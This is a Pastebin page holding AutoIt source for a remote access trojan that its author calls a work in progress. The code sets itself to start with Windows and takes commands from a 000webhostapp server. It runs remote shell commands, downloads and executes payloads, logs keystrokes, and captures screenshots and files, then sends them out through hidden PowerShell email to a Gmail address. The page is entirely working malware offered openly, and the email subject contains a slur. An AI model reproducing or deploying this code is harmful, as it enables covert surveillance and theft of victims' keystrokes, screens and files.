Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <InetConstants.au3>
- #include <MsgBoxConstants.au3>
- #include <WinAPIFiles.au3>
- #include <Misc.au3>
- #include <WindowsConstants.au3>
- #include <AutoItConstants.au3>
- #include <ScreenCapture.au3>
- ;this is the client side version of a silly rat i am working on
- Global $exename = "ratattempt.exe"
- ;stage will controll what the rat is doing locally, for example. stage 0 is look for instructions
- If Not FileExists(@StartupDir & "/" & $exename) Then
- FileCopy(@ScriptFullPath, @StartupDir)
- EndIf
- Global $herenum = 0 ; for use in hiddenshell
- Global $sURL = 'http://isavigualco.000webhostapp.com/'
- Global $num = 1
- Global $stage = 0
- While(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "keylog")
- ;While (true)
- ;rat must get instructions
- Sleep(4000)
- while ($stage == 0);read commands
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "instructions" Then
- $stage = -1;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "keylog" Then
- $stage = 1;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "cmd" Then
- $stage = 2;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "printscreen" Then
- $stage = 3;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- $stage = 4;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "troll" Then
- $stage = 5;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- $stage = 6;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "flipout" Then
- $stage = 7;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "closecommonapps" Then
- $stage = 8;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hiddenshell" Then
- $stage = 9;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "download" Then
- $stage = 10;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hprintscreen" Then
- $stage = 11;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "upload" Then
- $stage = 12;
- EndIf
- $num = $num + 1
- WEnd
- While($stage == 2);cmd
- If _Singleton("cmd.exe") <> 0 Then
- Run("cmd.exe")
- EndIf
- ;Run( @startupdir & "/" & $exename)
- Sleep(30000)
- Run( @startupdir & "/" & $exename)
- $num = $num + 1
- Global $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
- $num = $num + 1
- Send($cmdline)
- Send("{ENTER}")
- While BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "returnzero"
- $num = $num + 1
- $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
- Sleep(10000)
- Send($cmdline)
- Send("{ENTER}")
- WEnd
- $num = $num + 1
- If _Singleton("cmd.exe") = 0 Then
- ProcessClose ( "cmd.exe" )
- EndIf
- $stage = 0
- WEnd
- While ($stage == 3);printscreen
- Local $hDLL = DllOpen("USER32.dll")
- DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", 2);
- _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
- $num = $num + 1
- While($stage = 3)
- Global $mouseposition = MouseGetPos()
- Sleep(30000)
- Global $mousepositios = MouseGetPos()
- if $mouseposition == $mousepositios Then
- Sleep(3000)
- Run("cmd.exe")
- Sleep(1000)
- Send("Start Powershell")
- Send("{ENTER}")
- Sleep(7000)
- Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- Send(" -Attachments ")
- Send(@MyDocumentsDir)
- Send("\GDIPlus_Image1.jpg")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- Send("{ENTER}")
- Sleep(2000)
- Send("pass");
- Send("{ENTER}")
- ;FileOpen($log)
- Sleep(60000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- Sleep(30000)
- EndIf
- $stage = 0;
- WEnd
- DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", -1)
- Wend
- While($stage == 4);kill
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- ProcessClose($exename)
- Exit 0
- Wend
- While($stage == 5);troll
- Send("e")
- Sleep(10000)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- $num = $num + 1
- WEnd
- While($stage == 6);obliterate
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- FileDelete(@StartupDir & "/" & $exename)
- FileDelete(@TempDir & "\setup.exe")
- FileDelete(@TempDir & "/testandofileopen.bat", $FO_APPEND)
- ProcessClose($exename)
- FileDelete(@TempDir & "\setup.exe")
- WEnd
- While($stage == 7);flipout
- Sleep(3000)
- if Random(0,10,1) > 7 Then
- Send("{CTRLDOWN}")
- Send("{ALTDOWN}")
- Send("{DOWN}")
- Send("{ALTUP}")
- Send("{CTRLUP}")
- Endif
- $num = $num + 1
- Sleep(3000)
- if Random(0,10,1) > 7 Then
- Send("{CTRLDOWN}")
- Send("{ALTDOWN}")
- Send("{DEL}")
- Send("{ALTUP}")
- Send("{CTRLUP}")
- Endif
- Sleep(3000)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- $stage = 4;
- EndIf
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- $stage = 6;
- EndIf
- WEnd
- While($stage == 8);closeapps
- If _Singleton("cmd.exe") = 0 Then
- ProcessClose ( "cmd.exe" )
- EndIf
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- $num = $num + 1
- ProcessClose("chrome.exe")
- ;ProcessClose("chrome.exe")
- ;iexplore.exe
- ProcessClose("iexplore.exe" )
- ProcessClose("winword.exe" )
- ProcessClose("powerpnt.exe")
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- $stage = 4;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- $stage = 6;
- EndIf
- ProcessClose("firefox.exe")
- ProcessClose("mspaint.exe")
- ProcessClose("notepad.exe")
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- WEnd
- While($stage == 9);HIDDENSHELL
- Sleep(12000)
- if $herenum = 0 then
- Local $oShell = ObjCreate("shell.application")
- $herenum = $herenum + 1
- $ShellObj=ObjCreate("WScript.Shell")
- $file = FileOpen(@TempDir & "/testandofileopen.bat", $FO_APPEND)
- Endif
- $num = $num + 1
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "close" Then
- FileWriteLine($file,BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) )
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "close" Then
- FileClose($file)
- $num = $num + 1
- $ShellObj.Run("C://temp/testandofileopen.bat", 0)
- $num = $num + 1
- $ShellObj = Null
- $herenum = 0;
- $num = $num + 1
- EndIf
- sleep(5000)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0
- EndIf
- WEnd
- While($stage == 10);Download and run
- Sleep(30000)
- Local $FileURL = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
- Local $FileName = @TempDir & "\Setup.exe"
- ;$FileSaveLocation = FileSaveDialog("Save Location...",@ScriptDir,"All (*.*)",18,$FileName)
- $FileSize = InetGetSize($FileURL)
- InetGet($FileURL,$FileName,0,1)
- While @InetGetActive
- $Percentage = @InetGetBytesRead * 100 / $FileSize
- ProgressSet($Percentage,"Downloaded " & @InetGetBytesRead & " of " & $FileSize & " bytes","Downloading " & $FileName)
- Sleep(250)
- Wend
- ProgressOff()
- ShellExecute (@TempDir & "\setup.exe") ; you may use Run (), RunWait () or ShellExecuteWait depending on setup.exe
- ;If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0
- ;EndIf
- WEnd
- While($stage == 11);hprintscreen
- ; Run('calc')
- ;Sleep(1000)
- ;WinWait('Calculator')
- ;Sleep(1000) ; Hide window with next line
- ;WinSetState('Calculator', '', @SW_HIDE)
- ;ControlClick('Calculator', '', '6')
- ;ControlClick('Calculator', '', '+')
- ;ControlClick('Calculator', '', '6')
- ;ControlClick('Calculator', '', '=')
- ;Sleep(1000) ; Show window with next line
- ;WinSetState('Calculator', '', @SW_SHOW)
- _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
- $num = $num + 1
- While($stage = 11)
- Global $mouseposition = MouseGetPos()
- Sleep(30000)
- Global $mousepositios = MouseGetPos()
- if $mouseposition == $mousepositios Then
- Sleep(3000)
- Run("powershell.exe")
- WinWait("Windows PowerShell")
- WinSetState("Windows PowerShell", "", @SW_HIDE)
- ;Send("Start Powershell")
- ;Send("{ENTER}")
- ;Sleep(7000)
- ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ControlSend("Windows PowerShell","", ""," -Attachments ")
- ControlSend("Windows PowerShell","", "",@MyDocumentsDir)
- ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ControlSend("Windows PowerShell","", "","{ENTER}")
- ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
- WinWait("Solicitação de credenciais do Windows PowerShell")
- WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
- ;FileOpen($log)
- Sleep(60000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- Sleep(30000)
- FileDelete(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
- EndIf
- $stage = 0;
- WEnd
- WEnd
- While($stage == 12);upload
- Sleep(12000)
- $num = $num + 1
- If FileExists(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))) Then
- Sleep(3000)
- Run("powershell.exe")
- WinWait("Windows PowerShell");dir<carpeta> >> files.txt
- WinSetState("Windows PowerShell", "", @SW_HIDE)
- $num = $num + 1
- ;Send("Start Powershell")
- ;Send("{ENTER}")
- ;Sleep(7000)
- ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ControlSend("Windows PowerShell","", ""," -Attachments ")
- ControlSend("Windows PowerShell","", "",BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)))
- ;ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ControlSend("Windows PowerShell","", "","{ENTER}")
- ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
- WinWait("Solicitação de credenciais do Windows PowerShell")
- WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
- ;FileOpen($log)
- Sleep(60000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- EndIf
- WEnd
- WEnd
- ;While($stage == 1);Keylogger
- ;======================================== Variables ============================================
- $hDll=DllOpen("user32.dll")
- $window2=""
- Global $date=@year&@mon&@mday
- $log=@ScriptDir&"/log"; Ðu?ng d?n t?i file log
- $keystroke=""
- ;$hexKey = '0x' & $hexKey
- ;===============================================================================================
- ;======================================== Directory ============================================
- DirCreate ($log)
- $file = FileOpen($log&"\logfiles"&$date&".htm", 1+256) ; T?o log luu tr? n?i dung capture (UTF-8)
- If $file = -1 Then ; thoát n?u g?p l?i
- Exit
- EndIf
- filewrite($file,'<font face=Verdana size=1>')
- ;Send-MailMessage -To $to -From $MyEmail -Subject $Subject -Body $Body -SmtpServer $SMTP -Credential (Get-Credential -Credential "$MyEmail")
- ;-UseSsl -Port 587 -DeliveryNotificationOption never
- ;===============================================================================================
- Func terminate()
- DllClose($hDll)
- Exit 0
- EndFunc
- ;Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body body -SmtpServer smtp.gmail.com -Credential (Get-Credential -Credential "isavigualco@gmail.com")-UseSsl -Port 587 -DeliveryNotificationOption never
- ;======================================== LogWrite ============================================
- Func _LogKeyPress($what2log)
- $window=WinGetTitle("")
- Switch $window
- Case $window2
- FileWrite($file,$what2log)
- Sleep(100)
- Case Else
- $window2=$window
- $main="<b>["& @Year&"."&@mon&"."&@mday&" "&@HOUR & ":" &@MIN & ":" &@SEC & '] Window: "'& $window& '"</b></br>'& $what2log
- If $window="Yahoo! Messenger" then
- FileWrite($file, '<br><BR><img src="yahoo.png" width=30 height=30>' & $main)
- ElseIf StringInStr($window,"Google Chrome") then
- FileWrite($file, '<br><BR><img src="chrome.png" width=30 height=30>' & $main)
- ElseIf StringInStr($window,"Mozilla Firefox") then
- FileWrite($file, '<br><BR><img src="Firefox.png" width=30 height=30>' & $main)
- ElseIf StringInStr($window,"Windows Internet Explorer") then
- FileWrite($file, '<br><BR><img src="IE.png" width=30 height=30>' & $main)
- EndIf ; Set icon cho m?t s? chuong trình thông d?ng d? ti?n theo dõi log
- sleep (100)
- EndSwitch
- EndFunc
- ;===============================================================================================
- $Dllcall = DllOpen("user32.dll")
- ;Call DLL d? s? d?ng hàm _IsPressed là hàm chính c?a keylogger
- ;======================================== Alphabets ============================================
- While 1
- If _IsPressed('6A',$Dllcall) Then
- local $a
- $a=terminate()
- EndIf
- If _IsPressed(41,$Dllcall) Then ;if return 1
- _LogKeyPress("a")
- EndIf
- If _IsPressed(42,$Dllcall) Then
- _LogKeyPress("b")
- EndIf
- If _IsPressed(43,$Dllcall) Then
- _LogKeyPress("c")
- EndIf
- If _IsPressed(44,$Dllcall) Then
- _LogKeyPress("d")
- EndIf
- If _IsPressed(45,$Dllcall) Then
- _LogKeyPress("e")
- EndIf
- If _IsPressed(46,$Dllcall) Then
- _LogKeyPress("f")
- EndIf
- If _IsPressed(47,$Dllcall) Then
- _LogKeyPress("g")
- EndIf
- If _IsPressed(48,$Dllcall) Then
- _LogKeyPress("h")
- EndIf
- If _IsPressed(49,$Dllcall) Then
- _LogKeyPress("i")
- EndIf
- If _IsPressed('4a',$Dllcall) Then
- _LogKeyPress("j")
- EndIf
- If _IsPressed('4b',$Dllcall) Then
- _LogKeyPress("k")
- EndIf
- If _IsPressed('4c',$Dllcall) Then
- _LogKeyPress("l")
- EndIf
- If _IsPressed('4d',$Dllcall) Then
- _LogKeyPress("m")
- EndIf
- If _IsPressed('4e',$Dllcall) = 1 Then
- _LogKeyPress("n")
- EndIf
- If _IsPressed('4f',$Dllcall) Then
- _LogKeyPress("o")
- EndIf
- If _IsPressed(50,$Dllcall) Then
- _LogKeyPress("p")
- EndIf
- If _IsPressed(51,$Dllcall) Then
- _LogKeyPress("q")
- EndIf
- If _IsPressed(52,$Dllcall) Then
- _LogKeyPress("r")
- EndIf
- If _IsPressed(53,$Dllcall) Then
- _LogKeyPress("s")
- EndIf
- If _IsPressed(54,$Dllcall) Then
- _LogKeyPress("t")
- EndIf
- If _IsPressed(55,$Dllcall) Then
- _LogKeyPress("u")
- EndIf
- If _IsPressed(56,$Dllcall) Then
- _LogKeyPress("v")
- EndIf
- If _IsPressed(57,$Dllcall) Then
- _LogKeyPress("w")
- EndIf
- If _IsPressed(58,$Dllcall) Then
- _LogKeyPress("x")
- EndIf
- If _IsPressed(59,$Dllcall) Then
- _LogKeyPress("y")
- EndIf
- If _IsPressed('5a',$Dllcall) Then
- _LogKeyPress("z")
- EndIf
- ;========================================================================================
- ;=================================== Numbers ===========================================
- If _IsPressed('30',$Dllcall) Then
- _LogKeyPress("0")
- EndIf
- If _IsPressed('31',$Dllcall) Then
- _LogKeyPress("1")
- EndIf
- If _IsPressed('32',$Dllcall) Then
- _LogKeyPress("2")
- EndIf
- If _IsPressed('33',$Dllcall) Then
- _LogKeyPress("3")
- EndIf
- If _IsPressed('34',$Dllcall) Then
- _LogKeyPress("4")
- EndIf
- If _IsPressed('35',$Dllcall) Then
- _LogKeyPress("5")
- EndIf
- If _IsPressed('36',$Dllcall) Then
- _LogKeyPress("6")
- EndIf
- If _IsPressed('37',$Dllcall) Then
- _LogKeyPress("7")
- EndIf
- If _IsPressed('38',$Dllcall) Then
- _LogKeyPress("8")
- EndIf
- If _IsPressed('39',$Dllcall) Then
- _LogKeyPress("9")
- EndIf
- ;===================================================================================
- ;=================================== Keystrokes ====================================
- If _IsPressed('20',$Dllcall) Then
- _LogKeyPress(" ")
- EndIf
- If _IsPressed('08',$Dllcall) Then
- _LogKeyPress("{BACKSPACE}")
- EndIf
- If _IsPressed('09',$Dllcall) Then
- _LogKeyPress("{TAB}")
- EndIf
- If _IsPressed('0d',$Dllcall) Then
- _LogKeyPress("{ENTER}")
- EndIf
- If _IsPressed('10',$Dllcall) Then
- _LogKeyPress("{SHIFT}")
- While _IsPressed("10")
- If _IsPressed('BA',$Dllcall) Then
- _LogKeyPress(";")
- ElseIf _IsPressed('BB',$Dllcall) Then
- _LogKeyPress("+")
- ElseIf _IsPressed('BC',$Dllcall) Then
- _LogKeyPress("<")
- ElseIf _IsPressed('BD',$Dllcall) Then
- _LogKeyPress("_")
- ElseIf _IsPressed('BE',$Dllcall) Then
- _LogKeyPress(">")
- ElseIf _IsPressed('BF',$Dllcall) Then
- _LogKeyPress("?")
- ElseIf _IsPressed('DB',$Dllcall) Then
- _LogKeyPress("{")
- ElseIf _IsPressed('DC',$Dllcall) Then
- _LogKeyPress("|")
- ElseIf _IsPressed('DD',$Dllcall) Then
- _LogKeyPress("}")
- ElseIf _IsPressed('30',$Dllcall) Then
- _LogKeyPress(")")
- ElseIf _IsPressed('31',$Dllcall) Then
- _LogKeyPress("!")
- ElseIf _IsPressed('32',$Dllcall) Then
- _LogKeyPress("@")
- ElseIf _IsPressed('33',$Dllcall) Then
- _LogKeyPress("#")
- ElseIf _IsPressed('34',$Dllcall) Then
- _LogKeyPress("$")
- ElseIf _IsPressed('35',$Dllcall) Then
- _LogKeyPress("%")
- ElseIf _IsPressed('36',$Dllcall) Then
- _LogKeyPress("^")
- ElseIf _IsPressed('37',$Dllcall) Then
- _LogKeyPress("&")
- ElseIf _IsPressed('38',$Dllcall) Then
- _LogKeyPress("*")
- ElseIf _IsPressed('39',$Dllcall) Then
- _LogKeyPress("(")
- EndIf
- Sleep(10) ; important to prevent 100% CPU usage in this tight little loop
- WEnd
- EndIf
- If _IsPressed('14',$Dllcall) Then
- _LogKeyPress("{CAPSLOCK}")
- EndIf
- If _IsPressed('1b',$Dllcall) Then
- _LogKeyPress("{ESC}")
- EndIf
- If _IsPressed('23',$Dllcall) Then
- _LogKeyPress("{END}")
- EndIf
- If _IsPressed('24',$Dllcall) Then
- _LogKeyPress("{HOME}")
- EndIf
- If _IsPressed('25',$Dllcall) Then
- _LogKeyPress("{LEFT ARROW}")
- EndIf
- If _IsPressed('26',$Dllcall) Then
- _LogKeyPress("{UP ARROW}")
- EndIf
- If _IsPressed('27',$Dllcall) Then
- _LogKeyPress("{RIGHT ARROW}")
- EndIf
- If _IsPressed('28',$Dllcall) Then
- _LogKeyPress("{DOWN ARROW}")
- EndIf
- If _IsPressed('2e',$Dllcall) Then
- _LogKeyPress("{DEL}")
- EndIf
- If _IsPressed('BA',$Dllcall) Then
- _LogKeyPress(";")
- EndIf
- If _IsPressed('BB',$Dllcall) Then
- _LogKeyPress("=")
- Mail()
- EndIf
- If _IsPressed('BC',$Dllcall) Then
- _LogKeyPress(",")
- EndIf
- If _IsPressed('BD',$Dllcall) Then
- _LogKeyPress("-")
- EndIf
- If _IsPressed('BE',$Dllcall) Then
- _LogKeyPress(".")
- EndIf
- If _IsPressed('BF',$Dllcall) Then
- _LogKeyPress("/")
- EndIf
- If _IsPressed('DB',$Dllcall) Then
- _LogKeyPress("[")
- EndIf
- If _IsPressed('DC',$Dllcall) Then
- _LogKeyPress("\")
- EndIf
- If _IsPressed('DD',$Dllcall) Then
- _LogKeyPress("]")
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- Mail()
- Send("=")
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "dumpkeyscan" Then
- Send("=")
- Mail()
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- ProcessClose($exename)
- Exit 0
- EndIf
- ;
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- FileDelete(@StartupDir & "/" & $exename)
- ProcessClose($exename)
- EndIf
- ;Global $filecontent = FileRead($log)
- ;Global $mouseposition = MouseGetPos()
- ;Sleep(300000)
- ;Global $mousepositios = MouseGetPos()
- ;if $mouseposition == $mousepositios Then
- ; Run("cmd.exe")
- ; Sleep(100)
- ;Send("Start Powershell")
- ;Send("{ENTER}")
- ;Sleep(3000)
- ;Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- ;Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ;Send(" -Attachments ")
- ;Send(@scriptdir)
- ;Send("/log/logfiles")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ;Send("{ENTER}")
- ;Sleep(2000)
- ;Send("pass");
- ;Send("{ENTER}")
- ;FileOpen($log)
- ;Sleep(30000)
- ; EndIf
- ;=======================================================================================
- WEnd
- Func Mail()
- while(true)
- Global $mouseposition = MouseGetPos()
- Sleep(300)
- Global $mousepositios = MouseGetPos()
- if $mouseposition == $mousepositios Then
- Run("powershell.exe")
- WinWait("Windows PowerShell")
- WinSetState("Windows PowerShell", "", @SW_HIDE)
- ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- FileClose($file)
- ControlSend("Windows PowerShell","", "","-SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ControlSend("Windows PowerShell","", ""," -Attachments ")
- ControlSend("Windows PowerShell","", "",@scriptdir)
- ControlSend("Windows PowerShell","", "","/log/logfiles")
- ControlSend("Windows PowerShell","", "",$date)
- ControlSend("Windows PowerShell","", "",".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ControlSend("Windows PowerShell","", "","{ENTER}")
- WinWait("Solicitação de credenciais do Windows PowerShell")
- WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
- ;Send("{ENTER}")
- ;FileOpen($log)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- ProcessClose($exename)
- Exit 0
- EndIf
- ;
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- FileDelete(@StartupDir & "/" & $exename)
- ProcessClose($exename)
- EndIf
- Sleep(10000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- Sleep(30000)
- EndIf
- FileDelete(@scriptdir & "/log/logfiles" & $date & ".htm")
- Run( @startupdir & "/" & $exename)
- Exit 0
- WEnd
- EndFunc
- ;WEnd
- ;WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement